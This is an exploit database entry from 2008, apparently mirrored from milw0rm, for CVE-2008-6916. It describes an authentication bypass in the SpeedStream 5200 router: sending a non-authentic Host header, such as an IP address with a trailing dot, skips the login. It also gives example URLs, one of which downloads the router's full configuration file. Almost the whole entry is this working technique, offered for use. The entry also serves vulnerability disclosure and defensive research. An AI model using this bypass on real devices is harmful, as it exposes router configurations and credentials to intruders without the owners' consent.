EXPLOITS

SpeedStream 5200 - Authentication Bypass Configuration Download

Author: hkm
type: remote
platform: hardware
port: 
date_added: 2008-11-06  
date_updated:   
verified: 1  
codes: OSVDB-49870;CVE-2008-6916  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7055.txt  

######################################################################################

 SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
 (Server: NetPort Software 1.1)

 It is posible to bypass authentication by modifying the Host header.
 If you use a Host that is not the authentic one it will not require authentication.

 http://189.255.255.255./          -  This would bypass authentication too.
 http://189.255.255.255./x.cfg     -  This downloads the full router conifguration.


 hkm [ @ ] hakim.ws
______________________________________________________________________________________
######################################################################################

# milw0rm.com [2008-11-07]